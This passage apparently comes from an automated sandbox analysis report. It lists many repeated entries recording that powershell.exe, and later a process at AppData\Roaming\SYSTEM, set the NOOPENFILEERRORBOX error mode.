                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\SYSTEMProcess information set: NOOPENFILEERRORBOX
